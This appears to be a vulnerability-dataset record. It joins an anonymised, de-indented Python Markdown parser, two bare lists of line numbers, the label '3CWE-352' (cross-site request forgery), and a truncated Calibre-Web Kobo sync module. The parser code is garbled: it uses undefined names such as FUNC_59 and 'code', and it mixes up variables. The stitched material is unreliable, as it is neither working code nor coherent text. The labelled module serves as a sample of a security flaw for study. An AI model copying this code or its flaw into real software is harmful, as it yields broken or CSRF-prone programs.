VAR_80 = cells.split('\n')
for VAR_101, VAR_100 in enumerate(VAR_80):
cells[VAR_101] = re.split(r' *\| *', VAR_100)
VAR_79['cells'] = VAR_80
self.tokens.append(VAR_79)
def FUNC_20(self, VAR_44):
VAR_69 = re.sub(r'^ *| *\| *$', '', VAR_44.group(1))
VAR_69 = re.split(r' *\| *', VAR_69)
VAR_81 = re.sub(r' *|\| *$', '', VAR_44.group(2))
VAR_81 = re.split(r' *\| *', VAR_81)
for VAR_101, VAR_100 in enumerate(VAR_81):
if re.search(r'^ *-+: *$', VAR_100):
VAR_81[VAR_101] = 'right'
elif re.search(r'^ *:-+: *$', VAR_100):
VAR_81[VAR_101] = 'center'
elif re.search(r'^ *:-+ *$', VAR_100):
VAR_81[VAR_101] = 'left'
else:
VAR_81[VAR_101] = None
VAR_79 = {
'type': 'table',
'header': VAR_69,
'align': VAR_81,
}
return VAR_79
def FUNC_21(self, VAR_44):
VAR_82 = VAR_44.group(1)
if not VAR_82:
VAR_14 = VAR_44.group(0)
self.tokens.append({
'type': 'close_html',
'text': VAR_14
})
else:
VAR_102 = VAR_44.group(2)
VAR_14 = VAR_44.group(3)
self.tokens.append({
'type': 'open_html',
'tag': VAR_82,
'extra': VAR_102,
'text': VAR_14
})
def FUNC_22(self, VAR_44):
VAR_14 = VAR_44.group(1).rstrip('\n')
self.tokens.append({'type': 'paragraph', 'text': VAR_14})
def FUNC_23(self, VAR_44):
VAR_14 = VAR_44.group(0)
self.tokens.append({'type': 'text', 'text': VAR_14})
class CLASS_2(object):
VAR_19 = re.compile(r'^\\([\\`*{}\[\]()#+\-.!_>~|])') # \* \+ \! ....
VAR_47 = re.compile(
r'^(?:%s|%s|%s)' % (
r'<!--[\s\S]*?-->',
r'<(\w+%s)((?:%s)*?)\s*>([\s\S]*?)<\/\1>' % (
VAR_8, VAR_9),
r'<\w+%s(?:%s)*?\s*\/?>' % (VAR_8, VAR_9),
)
)
VAR_48 = re.compile(r'^<([^ >]+(@|:)[^ >]+)>')
VAR_49 = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\('
r'''\s*(<)?([\s\S]*?)(?(2)>)(?:\s+['"]([\s\S]*?)['"])?\s*'''
r'\)'
)
VAR_50 = re.compile(
r'^!?\[('
r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
r')\]\s*\[([^^\]]*)\]'
)
VAR_51 = re.compile(r'^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]')
VAR_17 = re.compile(r'''^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])''')
VAR_52 = re.compile(
r'^_{2}([\s\S]+?)_{2}(?!_)' # __word__
r'|'
r'^\*{2}([\s\S]+?)\*{2}(?!\*)' # **word**
)
VAR_53 = re.compile(
r'^\b_((?:__|[^_])+?)_\b' # _word_
r'|'
r'^\*((?:\*\*|[^\*])+?)\*(?!\*)' # *word*
)
VAR_54 = re.compile(r'^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)') # `VAR_54`
VAR_55 = re.compile(r'^ {2,}\n(?!\s*$)')
VAR_56 = re.compile(r'^~~(?=\S)([\s\S]*?\S)~~') # ~~word~~
VAR_57 = re.compile(r'^\[\^([^\]]+)\]')
VAR_14 = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| {2,}\n|$)')
def FUNC_24(self):
self.linebreak = re.compile(r'^ *\n(?!\s*$)')
self.text = re.compile(
r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| *\n|$)'
)
class CLASS_3(object):
VAR_39 = CLASS_2
VAR_40 = [
'escape', 'inline_html', 'autolink', 'url',
'footnote', 'link', 'reflink', 'nolink',
'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
VAR_58 = [
'escape', 'autolink', 'url', 'link', 'reflink',
'nolink', 'double_emphasis', 'emphasis', 'code',
'linebreak', 'strikethrough', 'text',
]
def __init__(self, VAR_59, VAR_43=None, **VAR_20):
self.renderer = VAR_59
self.links = {}
self.footnotes = {}
self.footnote_index = 0
if not VAR_43:
rules = self.grammar_class()
VAR_20.update(self.renderer.options)
if VAR_20.get('hard_wrap'):
VAR_43.hard_wrap()
self.rules = VAR_43
self._in_link = False
self._in_footnote = False
self._parse_inline_html = VAR_20.get('parse_inline_html')
def __call__(self, VAR_14, VAR_43=None):
return self.output(VAR_14, VAR_43)
def FUNC_25(self, VAR_60, VAR_61):
self.footnote_index = 0
self.links = VAR_60 or {}
self.footnotes = VAR_61 or {}
def VAR_83(self, VAR_14, VAR_43=None):
VAR_14 = VAR_14.rstrip('\n')
if not VAR_43:
rules = FUNC_48(self.default_rules)
if self._in_footnote and 'footnote' in VAR_43:
rules.remove('footnote')
VAR_83 = self.renderer.placeholder()
def FUNC_84(VAR_14):
for VAR_13 in VAR_43:
VAR_21 = getattr(self.rules, VAR_13)
VAR_44 = VAR_21.match(VAR_14)
if not VAR_44:
continue
self.line_match = VAR_44
VAR_87 = getattr(self, 'output_%s' % VAR_13)(VAR_44)
if VAR_87 is not None:
return VAR_44, VAR_87
return False # pragma: no cover
while VAR_14:
VAR_84 = FUNC_84(VAR_14)
if VAR_84 is not False:
VAR_44, VAR_87 = VAR_84
VAR_83 += VAR_87
VAR_14 = FUNC_59[len(VAR_44.group(0)):]
continue
if VAR_14: # pragma: no cover
raise RuntimeError('Infinite loop at: %s' % VAR_14)
return VAR_83
def FUNC_27(self, VAR_44):
VAR_14 = VAR_44.group(1)
return self.renderer.escape(VAR_14)
def FUNC_28(self, VAR_44):
VAR_49 = VAR_44.group(1)
if VAR_44.group(2) == '@':
VAR_72 = True
else:
VAR_72 = False
return self.renderer.autolink(VAR_49, VAR_72)
def FUNC_29(self, VAR_44):
VAR_49 = VAR_44.group(1)
if self._in_link:
return self.renderer.text(VAR_49)
return self.renderer.autolink(VAR_49, False)
def FUNC_30(self, VAR_44):
VAR_82 = VAR_44.group(1)
if self._parse_inline_html and VAR_82 in VAR_6:
VAR_14 = VAR_44.group(3)
if VAR_82 == 'a':
self._in_link = True
VAR_14 = self.output(VAR_14, VAR_43=self.inline_html_rules)
self._in_link = False
else:
VAR_14 = self.output(VAR_14, VAR_43=self.inline_html_rules)
VAR_93 = VAR_44.group(2) or ''
VAR_64 = '<%s%s>%s</%s>' % (VAR_82, VAR_93, VAR_14, VAR_82)
else:
VAR_64 = VAR_44.group(0)
return self.renderer.inline_html(VAR_64)
def FUNC_31(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 not in self.footnotes:
return None
if self.footnotes[VAR_13]:
return None
self.footnote_index += 1
self.footnotes[VAR_13] = self.footnote_index
return self.renderer.footnote_ref(VAR_13, self.footnote_index)
def FUNC_32(self, VAR_44):
return self._process_link(VAR_44, VAR_44.group(3), VAR_44.group(4))
def FUNC_33(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(2) or VAR_44.group(1))
if VAR_13 not in self.links:
return None
VAR_84 = self.links[VAR_13]
return self._process_link(VAR_44, VAR_84['link'], VAR_84['title'])
def FUNC_34(self, VAR_44):
VAR_13 = FUNC_1(VAR_44.group(1))
if VAR_13 not in self.links:
return None
VAR_84 = self.links[VAR_13]
return self._process_link(VAR_44, VAR_84['link'], VAR_84['title'])
def FUNC_35(self, VAR_44, VAR_49, VAR_62=None):
VAR_85 = VAR_44.group(0)
VAR_14 = VAR_44.group(1)
if VAR_85[0] == '!':
return self.renderer.image(VAR_49, VAR_62, VAR_14)
self._in_link = True
VAR_14 = self.output(VAR_14)
self._in_link = False
return self.renderer.link(VAR_49, VAR_62, VAR_14)
def FUNC_36(self, VAR_44):
VAR_14 = VAR_44.group(2) or VAR_44.group(1)
VAR_14 = self.output(VAR_14)
return self.renderer.double_emphasis(VAR_14)
def FUNC_37(self, VAR_44):
VAR_14 = VAR_44.group(2) or VAR_44.group(1)
VAR_14 = self.output(VAR_14)
return self.renderer.emphasis(VAR_14)
def FUNC_38(self, VAR_44):
VAR_14 = VAR_44.group(2)
return self.renderer.codespan(VAR_14)
def FUNC_39(self, VAR_44):
return self.renderer.linebreak()
def FUNC_40(self, VAR_44):
VAR_14 = self.output(VAR_44.group(1))
return self.renderer.strikethrough(VAR_14)
def FUNC_41(self, VAR_44):
VAR_14 = VAR_44.group(0)
return self.renderer.text(VAR_14)
class CLASS_4(object):
def __init__(self, **VAR_20):
self.options = VAR_20
def FUNC_42(self):
return ''
def VAR_26(self, VAR_54, VAR_63=None):
VAR_54 = code.rstrip('\n')
if not VAR_63:
VAR_54 = VAR_19(VAR_54, VAR_16=False)
return '<pre><VAR_54>%s\n</VAR_54></pre>\n' % VAR_54
VAR_54 = VAR_19(VAR_54, VAR_15=True, VAR_16=False)
return '<pre><VAR_54 class="lang-%s">%s\n</VAR_54></pre>\n' % (VAR_63, VAR_54)
def VAR_31(self, VAR_14):
return '<blockquote>%s\n</blockquote>\n' % VAR_14.rstrip('\n')
def VAR_36(self, VAR_64):
if self.options.get('skip_style') and \
VAR_64.lower().startswith('<style'):
return ''
if self.options.get('escape'):
return VAR_19(VAR_64)
return VAR_64
def VAR_69(self, VAR_14, VAR_65, VAR_66=None):
return '<h%d>%s</h%d>\n' % (VAR_65, VAR_14, VAR_65)
def VAR_28(self):
if self.options.get('use_xhtml'):
return '<hr />\n'
return '<hr>\n'
def FUNC_48(self, VAR_67, VAR_68=True):
VAR_82 = 'ul'
if VAR_68:
VAR_82 = 'ol'
return '<%s>\n%s</%s>\n' % (VAR_82, VAR_67, VAR_82)
def VAR_33(self, VAR_14):
return '<li>%s</li>\n' % VAR_14
def VAR_35(self, VAR_14):
return '<p>%s</p>\n' % VAR_14.strip(' ')
def VAR_37(self, VAR_69, VAR_67):
return (
'<VAR_37>\n<thead>%s</thead>\n'
'<tbody>\n%s</tbody>\n</VAR_37>\n'
) % (VAR_69, VAR_67)
def FUNC_52(self, VAR_70):
return '<tr>\n%s</tr>\n' % VAR_70
def FUNC_53(self, VAR_70, **VAR_71):
if VAR_71['header']:
VAR_82 = 'th'
else:
VAR_82 = 'td'
VAR_81 = VAR_71['align']
if not VAR_81:
return '<%s>%s</%s>\n' % (VAR_82, VAR_70, VAR_82)
return '<%s style="text-VAR_81:%s">%s</%s>\n' % (
VAR_82, VAR_81, VAR_70, VAR_82
)
def VAR_52(self, VAR_14):
return '<strong>%s</strong>' % VAR_14
def VAR_53(self, VAR_14):
return '<em>%s</em>' % VAR_14
def FUNC_56(self, VAR_14):
VAR_14 = VAR_19(VAR_14.rstrip(), VAR_16=False)
return '<VAR_54>%s</VAR_54>' % VAR_14
def VAR_55(self):
if self.options.get('use_xhtml'):
return '<br />\n'
return '<br>\n'
def VAR_56(self, VAR_14):
return '<del>%s</del>' % VAR_14
def VAR_14(self, VAR_14):
if self.options.get('parse_block_html'):
return VAR_14
return VAR_19(VAR_14)
def VAR_19(self, VAR_14):
return VAR_19(VAR_14)
def VAR_48(self, VAR_49, VAR_72=False):
VAR_14 = VAR_49 = FUNC_3(VAR_49)
if VAR_72:
VAR_49 = 'mailto:%s' % VAR_49
return '<a href="%s">%s</a>' % (VAR_49, VAR_14)
def VAR_49(self, VAR_49, VAR_62, VAR_14):
VAR_49 = FUNC_3(VAR_49)
if not VAR_62:
return '<a href="%s">%s</a>' % (VAR_49, VAR_14)
VAR_62 = VAR_19(VAR_62, VAR_15=True)
return '<a href="%s" VAR_62="%s">%s</a>' % (VAR_49, VAR_62, VAR_14)
def FUNC_62(self, VAR_73, VAR_62, VAR_14):
VAR_73 = FUNC_3(VAR_73)
VAR_14 = VAR_19(VAR_14, VAR_15=True)
if VAR_62:
VAR_62 = VAR_19(VAR_62, VAR_15=True)
VAR_64 = '<img VAR_73="%s" alt="%s" VAR_62="%s"' % (VAR_73, VAR_14, VAR_62)
else:
VAR_64 = '<img VAR_73="%s" alt="%s"' % (VAR_73, VAR_14)
if self.options.get('use_xhtml'):
return '%s />' % VAR_64
return '%s>' % VAR_64
def VAR_47(self, VAR_64):
if self.options.get('escape'):
return VAR_19(VAR_64)
return VAR_64
def VAR_25(self):
return ''
def FUNC_65(self, VAR_13, VAR_74):
VAR_64 = (
'<sup class="footnote-ref" id="fnref-%s">'
'<a href="#fn-%s">%d</a></sup>'
) % (VAR_19(VAR_13), VAR_19(VAR_13), VAR_74)
return VAR_64
def FUNC_66(self, VAR_13, VAR_14):
VAR_86 = (
'<a href="#fnref-%s" class="footnote">↩</a>'
) % VAR_19(VAR_13)
VAR_14 = VAR_14.rstrip()
if VAR_14.endswith('</p>'):
VAR_14 = re.sub(r'<\/p>$', r'%s</p>' % VAR_86, VAR_14)
else:
VAR_14 = '%s<p>%s</p>' % (VAR_14, VAR_86)
VAR_64 = '<li id="fn-%s">%s</li>\n' % (VAR_19(VAR_13), VAR_14)
return VAR_64
def VAR_61(self, VAR_14):
VAR_64 = '<div class="footnotes">\n%s<ol>%s</ol>\n</div>\n'
return VAR_64 % (self.hrule(), VAR_14)
class CLASS_5(object):
def __init__(self, VAR_59=None, VAR_75=None, VAR_76=None, **VAR_20):
if not VAR_59:
VAR_59 = CLASS_4(**VAR_20)
else:
VAR_20.update(VAR_59.options)
self.renderer = VAR_59
if VAR_75 and inspect.isclass(VAR_75):
VAR_75 = VAR_75(VAR_59, **VAR_20)
if VAR_76 and inspect.isclass(VAR_76):
VAR_76 = VAR_76(**VAR_20)
if VAR_75:
self.inline = VAR_75
else:
self.inline = CLASS_3(VAR_59, **VAR_20)
self.block = VAR_76 or CLASS_1(CLASS_0())
self.footnotes = []
self.tokens = []
self._parse_block_html = VAR_20.get('parse_block_html')
def __call__(self, VAR_14):
return self.parse(VAR_14)
def FUNC_68(self, VAR_14):
return self.parse(VAR_14)
def FUNC_6(self, VAR_14):
VAR_87 = self.output(FUNC_4(VAR_14))
VAR_88 = self.block.def_footnotes
self.block.def_links = {}
self.block.def_footnotes = {}
self.inline.links = {}
self.inline.footnotes = {}
if not self.footnotes:
return VAR_87
VAR_61 = filter(lambda o: VAR_88.get(o['key']), self.footnotes)
self.footnotes = sorted(
VAR_61, VAR_13=lambda o: VAR_88.get(o['key']), reverse=True
)
VAR_67 = self.renderer.placeholder()
while self.footnotes:
VAR_103 = self.footnotes.pop()
VAR_67 += self.renderer.footnote_item(
VAR_103['key'], VAR_103['text']
)
VAR_87 += self.renderer.footnotes(VAR_67)
return VAR_87
def FUNC_69(self):
if not self.tokens:
return None
self.token = self.tokens.pop()
return self.token
def FUNC_70(self):
if self.tokens:
return self.tokens[-1]
return None # pragma: no cover
def VAR_83(self, VAR_14, VAR_43=None):
self.tokens = self.block(VAR_14, VAR_43)
self.tokens.reverse()
self.inline.setup(self.block.def_links, self.block.def_footnotes)
VAR_87 = self.renderer.placeholder()
while self.pop():
VAR_87 += self.tok()
return VAR_87
def FUNC_71(self):
VAR_89 = self.token['type']
if VAR_89.endswith('_start'):
VAR_89 = t[:-6]
return getattr(self, 'output_%s' % VAR_89)()
def FUNC_72(self):
VAR_14 = self.token['text']
while self.peek()['type'] == 'text':
VAR_14 += '\n' + self.pop()['text']
return self.inline(VAR_14)
def FUNC_73(self):
return self.renderer.newline()
def FUNC_74(self):
return self.renderer.hrule()
def FUNC_75(self):
return self.renderer.header(
self.inline(self.token['text']),
self.token['level'],
self.token['text'],
)
def FUNC_38(self):
return self.renderer.block_code(
self.token['text'], self.token['lang']
)
def FUNC_76(self):
VAR_90 = self.token['align']
VAR_91 = len(VAR_90)
VAR_92 = self.renderer.placeholder()
VAR_69 = self.renderer.placeholder()
for VAR_101, value in enumerate(self.token['header']):
VAR_81 = VAR_90[VAR_101] if VAR_101 < VAR_91 else None
VAR_71 = {'header': True, 'align': VAR_81}
VAR_92 += self.renderer.table_cell(self.inline(value), **VAR_71)
VAR_69 += self.renderer.table_row(VAR_92)
VAR_67 = self.renderer.placeholder()
for VAR_101, row in enumerate(self.token['cells']):
VAR_92 = self.renderer.placeholder()
for j, value in enumerate(row):
VAR_81 = VAR_90[j] if j < VAR_91 else None
VAR_71 = {'header': False, 'align': VAR_81}
VAR_92 += self.renderer.table_cell(self.inline(value), **VAR_71)
VAR_67 += self.renderer.table_row(VAR_92)
return self.renderer.table(VAR_69, VAR_67)
def FUNC_77(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'block_quote_end':
VAR_67 += self.tok()
return self.renderer.block_quote(VAR_67)
def FUNC_78(self):
VAR_68 = self.token['ordered']
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_end':
VAR_67 += self.tok()
return self.renderer.list(VAR_67, VAR_68)
def FUNC_79(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
if self.token['type'] == 'text':
VAR_67 += self.tok_text()
else:
VAR_67 += self.tok()
return self.renderer.list_item(VAR_67)
def FUNC_80(self):
VAR_67 = self.renderer.placeholder()
while self.pop()['type'] != 'list_item_end':
VAR_67 += self.tok()
return self.renderer.list_item(VAR_67)
def FUNC_31(self):
self.inline._in_footnote = True
VAR_67 = self.renderer.placeholder()
VAR_13 = self.token['key']
while self.pop()['type'] != 'footnote_end':
VAR_67 += self.tok()
self.footnotes.append({'key': VAR_13, 'text': VAR_67})
self.inline._in_footnote = False
return self.renderer.placeholder()
def FUNC_81(self):
VAR_14 = self.token['text']
return self.renderer.block_html(VAR_14)
def FUNC_82(self):
VAR_14 = self.token['text']
VAR_82 = self.token['tag']
if self._parse_block_html and VAR_82 not in VAR_7:
VAR_14 = self.inline(VAR_14, VAR_43=self.inline.inline_html_rules)
VAR_93 = self.token.get('extra') or ''
VAR_64 = '<%s%s>%s</%s>' % (VAR_82, VAR_93, VAR_14, VAR_82)
return self.renderer.block_html(VAR_64)
def FUNC_83(self):
return self.renderer.paragraph(self.inline(self.token['text']))
def FUNC_41(self):
return self.renderer.paragraph(self.tok_text())
def FUNC_5(VAR_14, VAR_19=True, **VAR_20):
return CLASS_5(VAR_19=FUNC_2, **VAR_20)(VAR_14)
| [
1,
5,
7,
10,
13,
22,
23,
41,
42,
48,
49,
52,
53,
56,
59,
73,
74,
78,
83,
84,
91,
92,
95,
107,
169,
170,
174,
181,
186,
192,
197,
200,
202,
205,
208,
211,
221,
230,
235,
237,
244,
251,
258,
266,
269,
279,
282,
285,
288,
289,
292,
293,
298,
299,
303,
309,
314,
316,
319,
322,
326,
333,
337,
339,
341,
346,
348,
360,
362,
367,
370,
376,
379,
382,
387,
390,
396,
406,
413,
431,
435,
439,
440,
443,
482,
491,
492,
496,
508,
514,
517,
521,
523,
527,
530,
535,
540,
543,
545,
557,
567,
569,
573,
581,
587,
603,
613,
616,
623,
630,
636,
641,
646,
651,
655,
658,
662,
666,
667,
671,
674,
677,
681,
688,
691,
701,
704,
708,
711,
720,
723,
729,
735,
738,
746,
750,
754,
757,
765,
768,
772,
775,
790,
793,
797,
800,
804,
807,
812,
818,
821,
825,
828,
834,
837,
841,
844,
852,
855,
865,
868,
883,
886,
892,
896,
899,
908,
911,
925,
928,
933,
934,
937,
947,
949,
954,
959,
963,
964,
966,
969,
972,
976,
979,
981,
982,
985,
986,
989,
992,
997,
1004,
1007,
1013,
1018,
1022,
1024,
1029,
1032,
1033,
1036,
1038,
1044,
1047,
1050,
1057,
1062,
1067,
1068,
1074,
1076,
1077,
1086,
1088,
1094,
1101,
1109,
1111,
1117,
1127,
1131,
1140,
1143,
1146,
1147,
1150,
1159,
2,
3,
4,
5,
6,
7,
8,
9,
55,
56,
57,
58,
59,
60,
61,
62,
76,
94,
172,
442,
494,
669,
670,
936,
937,
938,
939,
940,
941,
1149,
1150,
1151,
1152,
1153,
1154,
1155,
1156,
1157,
260,
484,
485,
486,
676,
677,
678,
679,
680,
681,
682,
683,
684,
685,
686,
690,
691,
692,
693,
694,
703,
704,
705,
706,
710,
711,
712,
713,
722,
723,
724,
725,
726,
727,
731,
737,
738,
739,
740,
741,
748,
752,
756,
757,
758,
759,
760,
767,
768,
769,
770,
774,
775,
776,
777,
778,
779,
792,
793,
794,
795,
799,
800,
801,
802,
806,
807,
808,
809,
814,
820,
821,
822,
823,
827,
828,
829,
830,
836,
837,
838,
839,
843,
844,
845,
846,
847,
854,
855,
856,
857,
858,
859,
867,
868,
869,
870,
871,
872,
885,
886,
887,
888,
894,
898,
899,
900,
901,
902,
910,
911,
912,
913,
914,
927,
928,
929,
930,
971,
972,
973,
974
] | [
1,
5,
7,
10,
13,
22,
23,
41,
42,
48,
49,
53,
54,
57,
60,
74,
75,
79,
84,
85,
92,
93,
96,
108,
170,
171,
175,
182,
187,
193,
198,
201,
203,
206,
209,
212,
222,
231,
236,
238,
245,
252,
259,
267,
270,
280,
283,
286,
289,
290,
293,
294,
299,
300,
304,
310,
315,
317,
320,
323,
327,
334,
338,
340,
342,
347,
349,
361,
363,
368,
371,
377,
380,
383,
388,
391,
397,
407,
414,
432,
436,
440,
441,
444,
484,
493,
494,
498,
510,
516,
519,
523,
525,
529,
532,
537,
542,
545,
547,
559,
569,
571,
575,
583,
589,
605,
615,
618,
625,
632,
638,
643,
648,
653,
657,
660,
664,
668,
669,
673,
676,
679,
683,
690,
693,
703,
706,
710,
713,
722,
725,
731,
737,
740,
748,
752,
756,
759,
767,
770,
774,
777,
792,
795,
799,
802,
806,
809,
814,
820,
823,
827,
830,
836,
839,
843,
846,
854,
857,
867,
870,
885,
888,
894,
898,
901,
910,
913,
927,
930,
935,
936,
939,
949,
951,
956,
961,
965,
966,
968,
971,
974,
978,
981,
983,
984,
987,
988,
991,
994,
999,
1006,
1009,
1015,
1020,
1024,
1026,
1031,
1034,
1035,
1038,
1040,
1046,
1049,
1052,
1059,
1064,
1069,
1070,
1076,
1078,
1079,
1088,
1090,
1096,
1103,
1111,
1113,
1119,
1129,
1133,
1142,
1145,
1148,
1149,
1152,
1161,
2,
3,
4,
5,
6,
7,
8,
9,
56,
57,
58,
59,
60,
61,
62,
63,
77,
95,
173,
443,
496,
671,
672,
938,
939,
940,
941,
942,
943,
1151,
1152,
1153,
1154,
1155,
1156,
1157,
1158,
1159,
261,
486,
487,
488,
678,
679,
680,
681,
682,
683,
684,
685,
686,
687,
688,
692,
693,
694,
695,
696,
705,
706,
707,
708,
712,
713,
714,
715,
724,
725,
726,
727,
728,
729,
733,
739,
740,
741,
742,
743,
750,
754,
758,
759,
760,
761,
762,
769,
770,
771,
772,
776,
777,
778,
779,
780,
781,
794,
795,
796,
797,
801,
802,
803,
804,
808,
809,
810,
811,
816,
822,
823,
824,
825,
829,
830,
831,
832,
838,
839,
840,
841,
845,
846,
847,
848,
849,
856,
857,
858,
859,
860,
861,
869,
870,
871,
872,
873,
874,
887,
888,
889,
890,
896,
900,
901,
902,
903,
904,
912,
913,
914,
915,
916,
929,
930,
931,
932,
973,
974,
975,
976
] |
3CWE-352
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 shavitmichael, OzzieIsaacs
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import base64
import datetime
import sys
import os
import uuid
from time import gmtime, strftime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from flask import (
Blueprint,
request,
make_response,
jsonify,
current_app,
url_for,
redirect,
abort
)
from flask_login import current_user
from werkzeug.datastructures import Headers
from sqlalchemy import func
from sqlalchemy.sql.expression import and_, or_
from sqlalchemy.exc import StatementError
from sqlalchemy.sql import select
import requests
from . import config, logger, kobo_auth, db, calibre_db, helper, shelf as shelf_lib, ub
from .constants import sqlalchemy_version2
from .helper import get_download_link
from .services import SyncToken as SyncToken
from .web import download_required
from .kobo_auth import requires_kobo_auth, get_auth_token
KOBO_FORMATS = {"KEPUB": ["KEPUB"], "EPUB": ["EPUB3", "EPUB"]}
KOBO_STOREAPI_URL = "https://storeapi.kobo.com"
KOBO_IMAGEHOST_URL = "https://kbimages1-a.akamaihd.net"
SYNC_ITEM_LIMIT = 100
kobo = Blueprint("kobo", __name__, url_prefix="/kobo/<auth_token>")
kobo_auth.disable_failed_auth_redirect_for_blueprint(kobo)
kobo_auth.register_url_value_preprocessor(kobo)
log = logger.create()
def get_store_url_for_current_request():
# Programmatically modify the current url to point to the official Kobo store
__, __, request_path_with_auth_token = request.full_path.rpartition("/kobo/")
__, __, request_path = request_path_with_auth_token.rstrip("?").partition(
"/"
)
return KOBO_STOREAPI_URL + "/" + request_path
CONNECTION_SPECIFIC_HEADERS = [
"connection",
"content-encoding",
"content-length",
"transfer-encoding",
]
def get_kobo_activated():
return config.config_kobo_sync
def make_request_to_kobo_store(sync_token=None):
outgoing_headers = Headers(request.headers)
outgoing_headers.remove("Host")
if sync_token:
sync_token.set_kobo_store_header(outgoing_headers)
store_response = requests.request(
method=request.method,
url=get_store_url_for_current_request(),
headers=outgoing_headers,
data=request.get_data(),
allow_redirects=False,
timeout=(2, 10)
)
return store_response
def redirect_or_proxy_request():
if config.config_kobo_proxy:
if request.method == "GET":
return redirect(get_store_url_for_current_request(), 307)
else:
# The Kobo device turns other request types into GET requests on redirects, so we instead proxy to the Kobo store ourselves.
store_response = make_request_to_kobo_store()
response_headers = store_response.headers
for header_key in CONNECTION_SPECIFIC_HEADERS:
response_headers.pop(header_key, default=None)
return make_response(
store_response.content, store_response.status_code, response_headers.items()
)
else:
return make_response(jsonify({}))
def convert_to_kobo_timestamp_string(timestamp):
try:
return timestamp.strftime("%Y-%m-%dT%H:%M:%SZ")
except AttributeError as exc:
log.debug("Timestamp not valid: {}".format(exc))
return datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
@kobo.route("/v1/library/sync")
@requires_kobo_auth
@download_required
def HandleSyncRequest():
sync_token = SyncToken.SyncToken.from_headers(request.headers)
log.info("Kobo library sync request received.")
log.debug("SyncToken: {}".format(sync_token))
if not current_app.wsgi_app.is_proxied:
log.debug('Kobo: Received unproxied request, changed request port to external server port')
# TODO: Limit the number of books return per sync call, and rely on the sync-continuatation header
# instead so that the device triggers another sync.
new_books_last_modified = sync_token.books_last_modified
new_books_last_created = sync_token.books_last_created
new_reading_state_last_modified = sync_token.reading_state_last_modified
new_archived_last_modified = datetime.datetime.min
sync_results = []
# We reload the book database so that the user get's a fresh view of the library
# in case of external changes (e.g: adding a book through Calibre).
calibre_db.reconnect_db(config, ub.app_DB_path)
only_kobo_shelves = current_user.kobo_only_shelves_sync
if only_kobo_shelves:
if sqlalchemy_version2:
changed_entries = select(db.Books,
ub.ArchivedBook.last_modified,
ub.BookShelf.date_added,
ub.ArchivedBook.is_archived)
else:
changed_entries = calibre_db.session.query(db.Books,
ub.ArchivedBook.last_modified,
ub.BookShelf.date_added,
ub.ArchivedBook.is_archived)
changed_entries = (changed_entries
.join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
.join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
.filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
ub.KoboSyncedBooks.book_id == None))
#.filter(or_(db.Books.last_modified > sync_token.books_last_modified,
# ub.BookShelf.date_added > sync_token.books_last_modified))
.filter(ub.BookShelf.date_added > sync_token.books_last_modified) #?? or also or from above
.filter(db.Data.format.in_(KOBO_FORMATS))
.filter(calibre_db.common_filters())
.order_by(db.Books.id)
.order_by(ub.ArchivedBook.last_modified)
.join(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)
.join(ub.Shelf)
.filter(ub.Shelf.user_id == current_user.id)
.filter(ub.Shelf.kobo_sync)
.distinct()
)
else:
if sqlalchemy_version2:
changed_entries = select(db.Books, ub.ArchivedBook.last_modified, ub.ArchivedBook.is_archived)
else:
changed_entries = calibre_db.session.query(db.Books,
ub.ArchivedBook.last_modified,
ub.ArchivedBook.is_archived)
changed_entries = (changed_entries
.join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
.join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
.filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
ub.KoboSyncedBooks.book_id == None))
.filter(calibre_db.common_filters())
.filter(db.Data.format.in_(KOBO_FORMATS))
.order_by(db.Books.last_modified)
.order_by(db.Books.id)
)
#if sync_token.books_last_id > -1:
# changed_entries = changed_entries.filter(db.Books.id > sync_token.books_last_id)
reading_states_in_new_entitlements = []
if sqlalchemy_version2:
books = calibre_db.session.execute(changed_entries.limit(SYNC_ITEM_LIMIT))
else:
books = changed_entries.limit(SYNC_ITEM_LIMIT)
for book in books:
add_synced_books(book.Books.id)
formats = [data.format for data in book.Books.data]
if not 'KEPUB' in formats and config.config_kepubifypath and 'EPUB' in formats:
helper.convert_book_format(book.Books.id, config.config_calibre_dir, 'EPUB', 'KEPUB', current_user.name)
kobo_reading_state = get_or_create_reading_state(book.Books.id)
entitlement = {
"BookEntitlement": create_book_entitlement(book.Books, archived=(book.is_archived == True)),
"BookMetadata": get_metadata(book.Books),
}
if kobo_reading_state.last_modified > sync_token.reading_state_last_modified:
entitlement["ReadingState"] = get_kobo_reading_state_response(book.Books, kobo_reading_state)
new_reading_state_last_modified = max(new_reading_state_last_modified, kobo_reading_state.last_modified)
reading_states_in_new_entitlements.append(book.Books.id)
ts_created = book.Books.timestamp
try:
